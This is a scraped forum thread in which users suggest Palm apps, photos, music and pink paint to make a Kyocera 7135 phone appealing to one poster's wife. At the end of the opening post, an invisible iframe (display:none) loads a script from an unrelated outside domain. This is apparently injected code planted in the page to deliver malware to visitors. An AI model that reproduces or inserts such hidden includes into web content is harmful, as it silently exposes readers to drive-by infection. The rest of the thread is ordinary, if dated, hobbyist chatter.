+ Reply to Thread
Page 1 of 2 1 2 LastLast

Girly Stuff for the 7135

Hi guys,

I bought myself and my wife a 7135 because i was offered a deal that i just couldn't pass up. Well, my wife has NEVER used a palm and is only interested in how cool and how "pretty" a phone is. So i am looking for "Fool-proof" and "Pretty" software for the wife. As of yet she is not convinced that she is gonna like the phone at all. She loves music so i got an SD card tricked out with all her favorite songs, hopefully this will help somewhat. But i still havn't found what i need to make it "pretty". Anyways, thanks for any help.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    You should be 10% smarter than the equipment you operate. For some of you, the 7135 is not the best choice of equipment.

Get some pictures of the family on there, that's always a winner.

try silver screen to make the UI of the palm side look "pretty".

I'm sure there will be some sort of daisy case or replacement cover coing out soon....

They always do

Re: Girly Stuff for the 7135

Originally posted by Byrd Dog
    Hi guys,

I bought myself and my wife a 7135 because i was offered a deal that i just couldn't pass up. Well, my wife has NEVER used a palm and is only interested in how cool and how "pretty" a phone is. So i am looking for "Fool-proof" and "Pretty" software for the wife. As of yet she is not convinced that she is gonna like the phone at all. She loves music so i got an SD card tricked out with all her favorite songs, hopefully this will help somewhat. But i still havn't found what i need to make it "pretty". Anyways, thanks for any help.
    Byrd Dog: Personally I think the phone is "pretty" even without adding a lot of additional bells and whistles. I agree with doing a lot of nice family pics on an SD Card and another for MP3s but just think of what she likes. I personally have another SD card full of ebooks that I got from one of the websites mentioned in another thread. They have all kinds of ebooks for all types of interests. Just my 2 cents worth! ---dmiowa

Hey Byrd Dog, is your wife into flowers much?
    I'm sure there are flower cataloging programs for Palm.

My female friends are so into flowers - and I can't understand... Sure they're pretty (the flowers I mean ), but how long can you look at one? Oh well.

download the menstral cycle program
    and the mirror program
    also, change all the sound files to chick flicks sounds

If you have a Baby on the way then...

Check out Heybaby from http://www.wagware.com I used this when our daughter in the oven and it was great monitoring her development.

Using "Heybaby" I knew what week we were on, it gave daily info. on her progress, pictures, Trimester dates, baby name ideas and allot more. It works beautifully on the 7135 too

all-in-all, a useful tool for couples who are expecting a baby.:angel

Put her favorite games on it too!
    iPhone therefore iAm.

I wouldn't worry about it. Women love this phone. I have had just as many women as men ask to look at or hold my phone. Even those that don't use the palm are excited about the bells and whistles on this thing. If she is the least bit interested in electronics she'll dig the phone.
    :drink2
    If at first you don't succeed, don't try sky diving.

Thanks for all the input guys.. i will be trying several of your suggestions. One thing i just though of was that she LOVES Instant Messanger on the computer so i'm gonna spring Verichat on her tonight. That should win me some points. We'll just have to wait and see.
    You should be 10% smarter than the equipment you operate. For some of you, the 7135 is not the best choice of equipment.

Originally posted by Steve B.
    I wouldn't worry about it. Women love this phone. I have had just as many women as men ask to look at or hold my phone. Even those that don't use the palm are excited about the bells and whistles on this thing. If she is the least bit interested in electronics she'll dig the phone.
    :drink2
    AMEN!!! It is a pretty phone as is. Someone needs to sell a nice pouch for it though since after 3.5 months I'm now tired of the holster.

Get Datebk5 w/icons. I use my sorority flower and other nice ones to highlight events.

Originally posted by Byrd Dog
    One thing i just though of was that she LOVES Instant Messanger on the computer so i'm gonna spring Verichat on her tonight. That should win me some points.
    If she's into IM then VeriChat alone will sell her on the 7135. But you'd better give her some good graffiti training and hook her up with a good text entry app (i.e. WordComplete, or some of the others mentioned around here)!
    Please visit my picture site: Robert-O-Rama :)

Oh yeah, i forgot all about text entry. She refuses to learn Graffiti, so anything that requires input she pops up the on screen keyboard. I own wordcomplete so she will have to learn to use that.

Administrator
    yeah to back rob up,

get verichat, so you guys can sty in touch 24/7. pictures of the family dog, etc are a bonus. you cant do much to "girl" it up but i know she will look very sexxy with it!! :Smoke:

Originally posted by marctronixx
    . . . you cant do much to "girl" it up but i know she will look very sexxy with it!! :Smoke:
    Using masking tape, tape off the screen, graffitti area, and each individual keypad button, each special use button and other control areas. . .

. . . .and then spray paint it pink.

Mine looks great.

THE PHONE'S 'STUDDLY' ENOUNG...WHAT CHICK WOULDN'T DIG IT!!

Originally posted by The Larch
    Using masking tape, tape off the screen, graffitti area, and each individual keypad button, each special use button and other control areas. . .

. . . .and then spray paint it pink.

Mine looks great.

OK -- Now show us the pics!
    iPhone therefore iAm.

Things which have helped me personalize my Palm, and which other women might enjoy or find useful:

Khroma and Khroma QC: Allows you to pick the color scheme for menus, dropdowns, background, etc. Unfortunately, the included schemes are pretty dreadful, but it's fun to make your own, and they can be saved and swapped quickly. I think I got this from freewarepalm.com.

Handyshopper: Awesome list program, makes grocery shopping fun! (well, OK, not, but anyway) I think Mom'sPDA had a link to this, freewarepalm may also have it. I often make the list up, then beam the database over to my husband if he happens to be the one going into town....

EggTimer or some similar timing program.

If she travels, Zagat's databases. (Can be stored on the card, but need to move to main memory to be used.) If she drinks, MDrinks.

Planetarium: Fun to be able to look up, and then look at the Palm to see what you're seeing.

Since I keep all my lists of birthday gifts and such on the Palm, I'm demo'ing a couple of apps for this: X'mas Gifts, and Gift List. Happy Days also tracks birthdays, although I haven't used it yet.

P.Fract makes pretty pictures.

Games games games!

This is sometimes hard for me, because I'm kind of a gearhead.... Was that girly enough?

Balancelog and/or CalorieKing

(Actually these aren't just for girls.)
    iPhone 4S BB8830/Treo700wx/Treo700w/ XV6600/Treo600/Kyo7135